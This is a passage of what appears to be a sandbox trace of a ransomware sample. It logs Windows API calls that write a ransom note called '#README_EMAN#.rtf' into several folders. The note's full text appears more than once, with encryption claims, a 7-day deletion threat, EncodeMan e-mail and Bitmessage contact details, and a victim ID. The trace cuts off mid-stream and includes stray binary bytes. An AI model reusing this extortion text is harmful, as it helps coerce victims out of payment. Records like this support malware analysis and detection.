p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.752] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.753] CloseHandle (hObject=0x228) returned 1 [0284.753] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0284.753] GetLastError () returned 0x2 [0284.753] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 